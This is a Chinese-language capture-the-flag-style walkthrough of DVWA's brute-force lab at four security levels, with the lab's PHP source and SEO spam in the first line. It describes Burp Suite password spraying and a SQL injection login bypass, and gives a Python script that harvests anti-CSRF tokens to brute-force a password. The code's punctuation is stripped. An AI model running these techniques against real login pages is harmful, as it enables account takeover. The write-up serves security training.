做花茶网站解说,海尔的网络营销模式,学校网站怎么做的好,使用框架开发wordpressDVWA - Brute Force
等级#xff1a;low
直接上bp弱口令爆破#xff0c;设置变量#xff0c;攻击类型最后一个#xff0c;payload为用户名、密码简单列表
直接run#xff0c;长度排序下#xff0c;不一样的就是正确的用户名和密码
另解#xff1a; 看一下…DVWA - Brute Force
等级low
直接上bp弱口令爆破设置变量攻击类型最后一个payload为用户名、密码简单列表
直接run长度排序下不一样的就是正确的用户名和密码
另解 看一下源码user变量直接被嵌入sql语句中没有进行任何过滤故可以用万能密码 or 11#截断sql语句使result值为1绕过登陆验证
等级medium
直接看源码
?phpif( isset( $_GET[ Login ] ) ) {// Sanitise username input$user $_GET[ username ];$user mysql_real_escape_string( $user );// Sanitise password input$pass $_GET[ password ];$pass mysql_real_escape_string( $pass );$pass md5( $pass );// Check the database$query SELECT * FROM users WHERE user $user AND password $pass;;$result mysql_query( $query ) or die( pre . mysql_error() . /pre );if( $result mysql_num_rows( $result ) 1 ) {// Get users details$avatar mysql_result( $result, 0, avatar );// Login successfulecho pWelcome to the password protected area {$user}/p;echo img src\{$avatar}\ /;}else {// Login failedsleep( 2 );echo prebr /Username and/or password incorrect./pre;}mysql_close();
}?添加了mysql_real_escape_string( )函数来转义参数中的特殊字符故万能密码行不通此外增加了登陆失败执行sleep(2)函数一定程度上限制了爆破攻击增加攻击者的成本。我们依旧用bp爆破但是要设置下请求间隔为2100毫秒
等级high
直接看源码
?phpif( isset( $_GET[ Login ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ user_token ], $_SESSION[ session_token ], index.php );// Sanitise username input$user $_GET[ username ];$user stripslashes( $user );$user mysql_real_escape_string( $user );// Sanitise password input$pass $_GET[ password ];$pass stripslashes( $pass );$pass mysql_real_escape_string( $pass );$pass md5( $pass );// Check database$query SELECT * FROM users WHERE user $user AND password $pass;;$result mysql_query( $query ) or die( pre . mysql_error() . /pre );if( $result mysql_num_rows( $result ) 1 ) {// Get users details$avatar mysql_result( $result, 0, avatar );// Login successfulecho pWelcome to the password protected area {$user}/p;echo img src\{$avatar}\ /;}else {// Login failedsleep( rand( 0, 3 ) );echo prebr /Username and/or password incorrect./pre;}mysql_close();
}// Generate Anti-CSRF token
generateSessionToken();?这里添加了token的校验checkToken( )函数检查用户token和会话token是否相同generateSessionToken( )函数是自定义函数用于创建user_token这里是从上一次请求的response里面提取的token我们抓个包分析下
所以我们用bp爆破的话要给token设置变量递归提取token操作如下
先设置grep规则要勾选总是重定向线程要设置成1url编码要把和去掉
然后run
另解
当然不熟悉bp操作的话可以写python脚本来解决如下
import re
import requests# 设置cookie
headers {Cookie: PHPSESSIDm7t4i0m8ft1rh1p6frtm5t0bh0; securityhigh,
}# 从返回值中提取cookie
def get_token():url http://ctfdemo.com:8008/vulnerabilities/brute/req requests.get(url, headersheaders)match re.search(rvalue\(.)\, req.text)return match.group(1)# 请求脚本这里为了省事用户名固定了
def brute(pw, user_token):url http://ctfdemo.com:8008/vulnerabilities/brute/params {username: admin,password: pw,Login: Login,user_token:user_token}req requests.get(url, paramsparams, headersheaders)return req.textdef main():with open(password.txt) as p:pslist p.readlines()p.close()for line in pslist:line line.strip()user_token get_token()result brute(line, user_token)print(%s...... 已测试 % line)if not incorrect in result:print(攻击成功密码是: %s % line)breakif __name__ __main__:main()输出
等级impossible
直接分析源码
?phpif( isset( $_POST[ Login ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ user_token ], $_SESSION[ session_token ], index.php );// Sanitise username input$user $_POST[ username ];$user stripslashes( $user );$user mysql_real_escape_string( $user );// Sanitise password input$pass $_POST[ password ];$pass stripslashes( $pass );$pass mysql_real_escape_string( $pass );$pass md5( $pass );// Default values$total_failed_login 3;$lockout_time 15;$account_locked false;// Check the database (Check user information)$data $db-prepare( SELECT failed_login, last_login FROM users WHERE user (:user) LIMIT 1; );$data-bindParam( :user, $user, PDO::PARAM_STR );$data-execute();$row $data-fetch();// Check to see if the user has been locked out.if( ( $data-rowCount() 1 ) ( $row[ failed_login ] $total_failed_login ) ) {// User locked out. Note, using this method would allow for user enumeration!//echo prebr /This account has been locked due to too many incorrect logins./pre;// Calculate when the user would be allowed to login again$last_login $row[ last_login ];$last_login strtotime( $last_login );$timeout strtotime( {$last_login} {$lockout_time} minutes );$timenow strtotime( now );// Check to see if enough time has passed, if it hasnt locked the accountif( $timenow $timeout )$account_locked true;}// Check the database (if username matches the password)$data $db-prepare( SELECT * FROM users WHERE user (:user) AND password (:password) LIMIT 1; );$data-bindParam( :user, $user, PDO::PARAM_STR);$data-bindParam( :password, $pass, PDO::PARAM_STR );$data-execute();$row $data-fetch();// If its a valid login...if( ( $data-rowCount() 1 ) ( $account_locked false ) ) {// Get users details$avatar $row[ avatar ];$failed_login $row[ failed_login ];$last_login $row[ last_login ];// Login successfulecho pWelcome to the password protected area em{$user}/em/p;echo img src\{$avatar}\ /;// Had the account been locked out since last login?if( $failed_login $total_failed_login ) {echo pemWarning/em: Someone might of been brute forcing your account./p;echo pNumber of login attempts: em{$failed_login}/em.br /Last login attempt was at: em${last_login}/em./p;}// Reset bad login count$data $db-prepare( UPDATE users SET failed_login 0 WHERE user (:user) LIMIT 1; );$data-bindParam( :user, $user, PDO::PARAM_STR );$data-execute();}else {// Login failedsleep( rand( 2, 4 ) );// Give the user some feedbackecho prebr /Username and/or password incorrect.br /br/Alternative, the account has been locked because of too many failed logins.br /If this is the case, emplease try again in {$lockout_time} minutes/em./pre;// Update bad login count$data $db-prepare( UPDATE users SET failed_login (failed_login 1) WHERE user (:user) LIMIT 1; );$data-bindParam( :user, $user, PDO::PARAM_STR );$data-execute();}// Set the last login time$data $db-prepare( UPDATE users SET last_login now() WHERE user (:user) LIMIT 1; );$data-bindParam( :user, $user, PDO::PARAM_STR );$data-execute();
}// Generate Anti-CSRF token
generateSessionToken();?使用了 PDOPHP Data Objects扩展即预处理和参数化查询避免了SQL注入攻击设置了最大登陆次数$total_failed_login 3当登陆失败的次数超过3次会输出警告信息锁定账户。在一方面确实防止了爆破攻击但是我们可以批量让用户锁定也是在一方面影响了用户的体验。
